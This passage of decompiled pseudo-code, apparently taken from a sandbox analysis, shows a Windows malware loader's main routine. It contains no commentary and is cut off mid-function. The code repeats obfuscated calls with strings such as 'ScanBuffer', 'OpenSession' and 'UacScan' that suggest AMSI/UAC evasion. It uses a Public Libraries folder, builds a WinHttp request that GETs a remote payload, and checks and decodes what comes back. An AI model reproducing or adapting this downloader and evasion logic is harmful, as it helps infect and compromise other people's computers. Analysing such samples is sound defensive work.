				E032A4698( &_v272, E032A4964(_v276));
				_push(_v272);
				E032A47B0( &_v284,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v280, E032A4964(_v284));
				_pop(_t5879); // executed
				E032B7C04(_v280,  *0x33d28a8, _t5879, _t7113); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v288, E032A4964(_v292));
				_push(_v288);
				E032A47B0( &_v300,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v296, E032A4964(_v300));
				_pop(_t5884); // executed
				E032B7C04(_v296,  *0x33d28a8, _t5884, _t7113); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v304, E032A4964(_v308));
				_push(_v304);
				E032A47B0( &_v316,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v312, E032A4964(_v316));
				_pop(_t5889); // executed
				E032B7C04(_v312,  *0x33d28a8, _t5889, _t7113); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v320, E032A4964(_v324));
				_push(_v320);
				E032A47B0( &_v332,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v328, E032A4964(_v332));
				_pop(_t5894); // executed
				E032B7C04(_v328,  *0x33d28a8, _t5894, _t7113); // executed
				E032A44F4(0x33d287c, "C:\\Users\\Public\\Libraries");
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("Initialize");
				E032A4824();
				E032A4698( &_v336, E032A4964(_v340));
				_push(_v336);
				E032A47B0( &_v348,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v344, E032A4964(_v348));
				_pop(_t5900); // executed
				E032B7C04(_v344,  *0x33d28a8, _t5900, _t7113); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v352, E032A4964(_v356));
				_push(_v352);
				E032A47B0( &_v364,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v360, E032A4964(_v364));
				_pop(_t5905); // executed
				E032B7C04(_v360,  *0x33d28a8, _t5905, _t7113); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v368, E032A4964(_v372));
				_push(_v368);
				E032A47B0( &_v380,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v376, E032A4964(_v380));
				_pop(_t5910); // executed
				E032B7C04(_v376,  *0x33d28a8, _t5910, _t7113); // executed
				E032A4698( &_v384, E032A4964( *0x33d27f0));
				_t2289 = E032A7E40(_v384);
				_t7114 = _t2289;
				if(_t2289 == 0) {
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("UacScan");
					E032A4824();
					E032A4698( &_v596, E032A4964(_v600));
					_push(_v596);
					E032A47B0( &_v608,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v604, E032A4964(_v608));
					_pop(_t5916); // executed
					E032B7C04(_v604,  *0x33d28a8, _t5916, __eflags); // executed
					E032A44F4(0x33d2898, 0x32c6cbc);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v612, E032A4964(_v616));
					_push(_v612);
					E032A47B0( &_v624,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v620, E032A4964(_v624));
					_pop(_t5922); // executed
					E032B7C04(_v620,  *0x33d28a8, _t5922, __eflags); // executed
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v628, E032A4964(_v632));
					_push(_v628);
					E032A47B0( &_v640,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v636, E032A4964(_v640));
					_pop(_t5927); // executed
					E032B7C04(_v636,  *0x33d28a8, _t5927, __eflags); // executed
					E032A4DA4( &_v648,  *0x33d2800);
					E032BCBE8(_v648, 0x33d2880,  &_v644, _t7105); // executed
					E032A44F4(0x33d2878, _v644);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v652, E032A4964(_v656));
					_push(_v652);
					E032A47B0( &_v664,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v660, E032A4964(_v664));
					_pop(_t5935); // executed
					E032B7C04(_v660,  *0x33d28a8, _t5935, __eflags); // executed
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v668, E032A4964(_v672));
					_push(_v668);
					E032A47B0( &_v680,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v676, E032A4964(_v680));
					_pop(_t5940); // executed
					E032B7C04(_v676,  *0x33d28a8, _t5940, __eflags); // executed
					E032BCD4C( *0x33d2878, 0x33d2880,  &_v684, 0x32c6cc8, _t7104, _t7105); // executed
					_t5566 =  *0x32bca10; // 0x32bca14
					E032A57DC(0x33d2880, _t5566, _v684);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v688, E032A4964(_v692));
					_push(_v688);
					E032A47B0( &_v700,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v696, E032A4964(_v700));
					_pop(_t5947); // executed
					E032B7C04(_v696,  *0x33d28a8, _t5947, __eflags); // executed
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v704, E032A4964(_v708));
					_push(_v704);
					E032A47B0( &_v716,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v712, E032A4964(_v716));
					_pop(_t5952); // executed
					E032B7C04(_v712,  *0x33d28a8, _t5952, __eflags); // executed
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v720, E032A4964(_v724));
					_push(_v720);
					E032A47B0( &_v732,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v728, E032A4964(_v732));
					_pop(_t5957); // executed
					E032B7C04(_v728,  *0x33d28a8, _t5957, __eflags); // executed
					E032A44F4(0x33d2814,  *((intOrPtr*)( *0x33d2880 + 4)));
					E032A44F4(0x33d2838,  *((intOrPtr*)( *0x33d2880 + 8)));
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v736, E032A4964(_v740));
					_push(_v736);
					E032A47B0( &_v748,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v744, E032A4964(_v748));
					_pop(_t5966); // executed
					E032B7C04(_v744,  *0x33d28a8, _t5966, __eflags); // executed
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v752, E032A4964(_v756));
					_push(_v752);
					E032A47B0( &_v764,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v760, E032A4964(_v764));
					_pop(_t5971); // executed
					E032B7C04(_v760,  *0x33d28a8, _t5971, __eflags); // executed
					_t2447 = E032BCCD4( *0x33d2838, 0x33d2880, _t5971, _t7104, _t7105, __eflags, _t7125);
					__eflags = _t2447 - 1;
					if(_t2447 == 1) {
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v768, E032A4964(_v772));
						_push(_v768);
						E032A47B0( &_v780,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v776, E032A4964(_v780));
						_pop(_t6908); // executed
						E032B7C04(_v776,  *0x33d28a8, _t6908, __eflags); // executed
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanString");
						E032A4824();
						E032A4698( &_v784, E032A4964(_v788));
						_push(_v784);
						E032A47B0( &_v796,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v792, E032A4964(_v796));
						_pop(_t6913); // executed
						E032B7C04(_v792,  *0x33d28a8, _t6913, __eflags); // executed
						E032BD550( *0x33d2814, 0x33d2880,  &_v800, E032A7AB0( *0x33d2838, __eflags), _t7105);
						E032A44F4(0x33d28ac, _v800);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v804, E032A4964(_v808));
						_push(_v804);
						E032A47B0( &_v816,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v812, E032A4964(_v816));
						_pop(_t6920); // executed
						E032B7C04(_v812,  *0x33d28a8, _t6920, __eflags); // executed
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v820, E032A4964(_v824));
						_push(_v820);
						E032A47B0( &_v832,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v828, E032A4964(_v832));
						_pop(_t6925); // executed
						E032B7C04(_v828,  *0x33d28a8, _t6925, __eflags); // executed
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v836, E032A4964(_v840));
						_push(_v836);
						E032A47B0( &_v848,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v844, E032A4964(_v848));
						_pop(_t6930); // executed
						E032B7C04(_v844,  *0x33d28a8, _t6930, __eflags); // executed
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("UacScan");
						E032A4824();
						E032A4698( &_v852, E032A4964(_v856));
						_push(_v852);
						E032A47B0( &_v864,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v860, E032A4964(_v864));
						_pop(_t6935); // executed
						E032B7C04(_v860,  *0x33d28a8, _t6935, __eflags); // executed
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v868, E032A4964(_v872));
						_push(_v868);
						E032A47B0( &_v880,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v876, E032A4964(_v880));
						_pop(_t6940); // executed
						E032B7C04(_v876,  *0x33d28a8, _t6940, __eflags); // executed
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v884, E032A4964(_v888));
						_push(_v884);
						E032A47B0( &_v896,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v892, E032A4964(_v896));
						_pop(_t6945); // executed
						E032B7C04(_v892,  *0x33d28a8, _t6945, __eflags); // executed
						_t5093 = E032BD464( *0x33d28ac, 0x32c6cd8);
						__eflags = _t5093;
						if(_t5093 != 0) {
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v900, E032A4964(_v904));
							_push(_v900);
							E032A47B0( &_v912,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v908, E032A4964(_v912));
							_pop(_t6951); // executed
							E032B7C04(_v908,  *0x33d28a8, _t6951, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v916, E032A4964(_v920));
							_push(_v916);
							E032A47B0( &_v928,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v924, E032A4964(_v928));
							_pop(_t6956); // executed
							E032B7C04(_v924,  *0x33d28a8, _t6956, __eflags); // executed
							_push(0);
							L032ACD94();
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v932, E032A4964(_v936));
							_push(_v932);
							E032A47B0( &_v944,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v940, E032A4964(_v944));
							_pop(_t6961); // executed
							E032B7C04(_v940,  *0x33d28a8, _t6961, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("UacScan");
							E032A4824();
							E032A4698( &_v948, E032A4964(_v952));
							_push(_v948);
							E032A47B0( &_v960,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v956, E032A4964(_v960));
							_pop(_t6966); // executed
							E032B7C04(_v956,  *0x33d28a8, _t6966, __eflags); // executed
							E032B6DC0("WinHttp.WinHttpRequest.5.1", 0x33d2880,  &_v964, _t7104, _t7105, __eflags); // executed
							E032B287C(0x33d2804, _v964);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v968, E032A4964(_v972));
							_push(_v968);
							E032A47B0( &_v980,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v976, E032A4964(_v980));
							_pop(_t6973); // executed
							E032B7C04(_v976,  *0x33d28a8, _t6973, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v984, E032A4964(_v988));
							_push(_v984);
							E032A47B0( &_v996,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v992, E032A4964(_v996));
							_pop(_t6978); // executed
							E032B7C04(_v992,  *0x33d28a8, _t6978, __eflags); // executed
							_push(0);
							_push(0x33d28ac);
							E032AE3E0(0, 0x33d2804, 0x32c6d10, "GET"); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1000, E032A4964(_v1004));
							_push(_v1000);
							E032A47B0( &_v1012,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1008, E032A4964(_v1012));
							_pop(_t6983); // executed
							E032B7C04(_v1008,  *0x33d28a8, _t6983, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v1016, E032A4964(_v1020));
							_push(_v1016);
							E032A47B0( &_v1028,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1024, E032A4964(_v1028));
							_pop(_t6988); // executed
							E032B7C04(_v1024,  *0x33d28a8, _t6988, __eflags); // executed
							_push(0x32c6d1c);
							_push(0x33d2804);
							_push(0); // executed
							E032AE3E0(); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1032, E032A4964(_v1036));
							_push(_v1032);
							E032A47B0( &_v1044,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1040, E032A4964(_v1044));
							_pop(_t6993); // executed
							E032B7C04(_v1040,  *0x33d28a8, _t6993, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v1048, E032A4964(_v1052));
							_push(_v1048);
							E032A47B0( &_v1060,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1056, E032A4964(_v1060));
							_pop(_t6998); // executed
							E032B7C04(_v1056,  *0x33d28a8, _t6998, __eflags); // executed
							_push(0x32c6d28);
							_push(0x33d2804);
							_push( &_v1076); // executed
							E032AE3E0(); // executed
							_t7108 = _t7108 + 0x30;
							E032B17CC(0x33d2834, 0x33d2880,  &_v1076, _t7104, _t7105, _t7125);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("Initialize");
							E032A4824();
							E032A4698( &_v1080, E032A4964(_v1084));
							_push(_v1080);
							E032A47B0( &_v1092,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1088, E032A4964(_v1092));
							_pop(_t7004); // executed
							E032B7C04(_v1088,  *0x33d28a8, _t7004, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v1096, E032A4964(_v1100));
							_push(_v1096);
							E032A47B0( &_v1108,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1104, E032A4964(_v1108));
							_pop(_t7009); // executed
							E032B7C04(_v1104,  *0x33d28a8, _t7009, __eflags); // executed
							_v1112 =  *0x33d2834;
							_t5273 = _v1112;
							__eflags = _t5273;
							if(_t5273 != 0) {
								_t5334 = _t5273 - 4;
								__eflags = _t5334;
								_t5273 =  *_t5334;
							}
							__eflags = _t5273 - 0x7530;
							if(_t5273 > 0x7530) {
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v1116, E032A4964(_v1120));
								_push(_v1116);
								E032A47B0( &_v1128,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v1124, E032A4964(_v1128));
								_pop(_t7024);
								E032B7C04(_v1124,  *0x33d28a8, _t7024, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v1132, E032A4964(_v1136));
								_push(_v1132);
								E032A47B0( &_v1144,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v1140, E032A4964(_v1144));
								_pop(_t7029);
								E032B7C04(_v1140,  *0x33d28a8, _t7029, __eflags);
								E032BD858( *0x33d2834,  *0x33d28a8,  &_v1148);
								E032A44F4(0x33d2874, _v1148);
							}
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("Initialize");
							E032A4824();
							E032A4698( &_v1152, E032A4964(_v1156));
							_push(_v1152);
							E032A47B0( &_v1164,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1160, E032A4964(_v1164));
							_pop(_t7014); // executed
							E032B7C04(_v1160,  *0x33d28a8, _t7014, __eflags); // executed
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("UacScan");
							E032A4824();
							E032A4698( &_v1168, E032A4964(_v1172));
							_push(_v1168);
							E032A47B0( &_v1180,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1176, E032A4964(_v1180));
							_pop(_t7019); // executed
							E032B7C04(_v1176,  *0x33d28a8, _t7019, __eflags); // executed
							L032ACD9C();
						}
					}
				} else {
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v388, E032A4964(_v392));
					_push(_v388);
					E032A47B0( &_v400,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v396, E032A4964(_v400));
					_pop(_t7036);
					E032B7C04(_v396,  *0x33d28a8, _t7036, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v404, E032A4964(_v408));
					_push(_v404);
					E032A47B0( &_v416,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v412, E032A4964(_v416));
					_pop(_t7041);
					E032B7C04(_v412,  *0x33d28a8, _t7041, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v420, E032A4964(_v424));
					_push(_v420);
					E032A47B0( &_v432,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v428, E032A4964(_v432));
					_pop(_t7046);
					E032B7C04(_v428,  *0x33d28a8, _t7046, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v436, E032A4964(_v440));
					_push(_v436);
					E032A47B0( &_v448,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v444, E032A4964(_v448));
					_pop(_t7051);
					E032B7C04(_v444,  *0x33d28a8, _t7051, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v452, E032A4964(_v456));
					_push(_v452);
					E032A47B0( &_v464,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v460, E032A4964(_v464));
					_pop(_t7056);
					E032B7C04(_v460,  *0x33d28a8, _t7056, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v468, E032A4964(_v472));
					_push(_v468);
					E032A47B0( &_v480,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v476, E032A4964(_v480));
					_pop(_t7061);
					E032B7C04(_v476,  *0x33d28a8, _t7061, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v484, E032A4964(_v488));
					_push(_v484);
					E032A47B0( &_v496,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v492, E032A4964(_v496));
					_pop(_t7066);
					E032B7C04(_v492,  *0x33d28a8, _t7066, _t7114);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v500, E032A4964(_v504));
					_push(_v500);
					E032A47B0( &_v512,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v508, E032A4964(_v512));
					_pop(_t7071);
					E032B7C04(_v508,  *0x33d28a8, _t7071, _t7114);
					_t5448 = E032BCCD4( *0x33d2838, 0x33d2880, _t7071, _t7104, _t7105, _t7114, _t7125);
					_t7115 = _t5448 - 1;
					if(_t5448 == 1) {
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v516, E032A4964(_v520));
						_push(_v516);
						E032A47B0( &_v528,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v524, E032A4964(_v528));
						_pop(_t7076);
						E032B7C04(_v524,  *0x33d28a8, _t7076, _t7115);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v532, E032A4964(_v536));
						_push(_v532);
						E032A47B0( &_v544,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v540, E032A4964(_v544));
						_pop(_t7081);
						E032B7C04(_v540,  *0x33d28a8, _t7081, _t7115);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v548, E032A4964(_v552));
						_push(_v548);
						E032A47B0( &_v560,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v556, E032A4964(_v560));
						_pop(_t7086);
						E032B7C04(_v556,  *0x33d28a8, _t7086, _t7115);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v564, E032A4964(_v568));
						_push(_v564);
						E032A47B0( &_v576,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v572, E032A4964(_v576));
						_pop(_t7091);
						E032B7C04(_v572,  *0x33d28a8, _t7091, _t7115);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v580, E032A4964(_v584));
						_push(_v580);
						E032A47B0( &_v592,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v588, E032A4964(_v592));
						_pop(_t7096);
						E032B7C04(_v588,  *0x33d28a8, _t7096, _t7115);
					}
				}
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v1184, E032A4964(_v1188));
				_push(_v1184);
				E032A47B0( &_v1196,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v1192, E032A4964(_v1196));
				_pop(_t5976); // executed
				E032B7C04(_v1192,  *0x33d28a8, _t5976, _t7115); // executed
				_push(0x32c6aa0);
				_push( *0x33d28a8);
				_push("ScanString");
				E032A4824();
				E032A4698( &_v1200, E032A4964(_v1204));
				_push(_v1200);
				E032A47B0( &_v1212,  *0x33d28a8, 0x32c6aa0);
				E032A4698( &_v1208, E032A4964(_v1212));
				_pop(_t5981); // executed
				E032B7C04(_v1208,  *0x33d28a8, _t5981, _t7115); // executed
				_v1112 =  *0x33d2874;
				_t2477 = _v1112;
				if(_t2477 != 0) {
					_t2477 =  *((intOrPtr*)(_t2477 - 4));
				}
				_t7118 = _t2477 - 0x493e0;
				if(_t2477 <= 0x493e0) {
					L49:
					__eflags = 0;
					_pop(_t5982);
					 *[fs:eax] = _t5982;
					_push(0x32c6a75);
					E032A44C4( &_v4824, 0x64);
					E032A44C4( &_v4424, 0x18);
					E032A4C24( &_v4328);
					E032A44A0( &_v4324);
					E032A4C24( &_v4320);
					E032A44C4( &_v4316, 0x47);
					E032A44C4( &_v4024, 2);
					E032A44C4( &_v4032, 2);
					E032A44C4( &_v4016, 0xd);
					E032A4C24( &_v3964);
					E032A44C4( &_v3960, 0x54);
					E032A44C4( &_v3624, 0x26);
					E032A4C3C( &_v3472, 3);
					E032A44C4( &_v3460, 8);
					E032A4C3C( &_v3428, 6);
					E032A44C4( &_v3404, 0x10);
					E032A44C4( &_v3084, 0x1d);
					E032A44C4( &_v2968, 4);
					E032A4C24( &_v2952);
					E032A44A0( &_v2948);
					E032A4C24( &_v2944);
					E032A44C4( &_v2940, 0x26);
					E032A4C24( &_v2788);
					E032A44A0( &_v2784);
					E032A4C24( &_v2780);
					E032A44C4( &_v2776, 0x19);
					E032A4C24( &_v2676);
					E032A44A0( &_v2672);
					E032A4C24( &_v2668);
					E032A44C4( &_v2664, 0x16);
					E032A44C4( &_v2568, 2);
					E032A44C4( &_v2576, 2);
					E032A4C24( &_v2560);
					E032A44A0( &_v2556);
					E032A4C24( &_v2552);
					E032A44C4( &_v2548, 0x5e);
					E032A44A0( &_v2160);
					E032A44C4( &_v2172, 3);
					E032A44C4( &_v2156, 0x43);
					E032A4C24( &_v1888);
					E032A44A0( &_v1884);
					E032A4C24( &_v1880);
					E032A44C4( &_v1876, 0x19);
					E032A44C4( &_v1768, 2);
					E032A44C4( &_v1776, 2);
					E032A44C4( &_v1760, 0x56);
					_t6009 =  *0x32bca10; // 0x32bca14
					E032A57A0( &_v1416, _t6009);
					E032A44C4( &_v1412, 8);
					E032A44C4( &_v1376, 3);
					E032A44A0( &_v1380);
					E032A44C4( &_v1364, 0x3f);
					E032A44C4( &_v1108, 8);
					E032AE3D8( &_v1076);
					E032A44C4( &_v1060, 0x18);
					E032A5E70( &_v964);
					E032A44C4( &_v952, 2);
					E032A44C4( &_v960, 2);
					E032A44C4( &_v944, 0x41);
					_t6018 =  *0x32bca10; // 0x32bca14
					E032A57A0( &_v684, _t6018);
					E032A44C4( &_v680, 8);
					E032A4C24( &_v648);
					E032A44C4( &_v644, 0x15);
					E032A44C4( &_v552, 2);
					E032A44C4( &_v560, 2);
					E032A44C4( &_v544, 0x5f);
					E032A44C4( &_v160, 3);
					E032A44A0( &_v164);
					return E032A44C4( &_v148, 0x24);
				} else {
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1216, E032A4964(_v1220));
					_push(_v1216);
					E032A47B0( &_v1228,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1224, E032A4964(_v1228));
					_pop(_t6030);
					E032B7C04(_v1224,  *0x33d28a8, _t6030, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v1232, E032A4964(_v1236));
					_push(_v1232);
					E032A47B0( &_v1244,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1240, E032A4964(_v1244));
					_pop(_t6035);
					E032B7C04(_v1240,  *0x33d28a8, _t6035, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1248, E032A4964(_v1252));
					_push(_v1248);
					E032A47B0( &_v1260,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1256, E032A4964(_v1260));
					_pop(_t6040);
					E032B7C04(_v1256,  *0x33d28a8, _t6040, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1264, E032A4964(_v1268));
					_push(_v1264);
					E032A47B0( &_v1276,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1272, E032A4964(_v1276));
					_pop(_t6045);
					E032B7C04(_v1272,  *0x33d28a8, _t6045, _t7118);
					E032BD550( *0x33d2874, 0x33d2880,  &_v1280, E032A7AB0( *0x33d2838, _t7118), _t7105);
					E032A44F4(0x33d2800, _v1280);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v1284, E032A4964(_v1288));
					_push(_v1284);
					E032A47B0( &_v1296,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1292, E032A4964(_v1296));
					_pop(_t6052);
					E032B7C04(_v1292,  *0x33d28a8, _t6052, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v1300, E032A4964(_v1304));
					_push(_v1300);
					E032A47B0( &_v1312,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1308, E032A4964(_v1312));
					_pop(_t6057);
					E032B7C04(_v1308,  *0x33d28a8, _t6057, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1316, E032A4964(_v1320));
					_push(_v1316);
					E032A47B0( &_v1328,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1324, E032A4964(_v1328));
					_pop(_t6062);
					E032B7C04(_v1324,  *0x33d28a8, _t6062, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1332, E032A4964(_v1336));
					_push(_v1332);
					E032A47B0( &_v1344,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1340, E032A4964(_v1344));
					_pop(_t6067);
					E032B7C04(_v1340,  *0x33d28a8, _t6067, _t7118);
					E032BD4EC( *0x33d2800,  *0x33d28a8,  &_v1348);
					E032A44F4(0x33d2830, _v1348);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v1352, E032A4964(_v1356));
					_push(_v1352);
					E032A47B0( &_v1364,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1360, E032A4964(_v1364));
					_pop(_t6074);
					E032B7C04(_v1360,  *0x33d28a8, _t6074, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v1368, E032A4964(_v1372));
					_push(_v1368);
					E032A47B0( &_v1380,  *0x33d28a8, 0x32c6aa0);
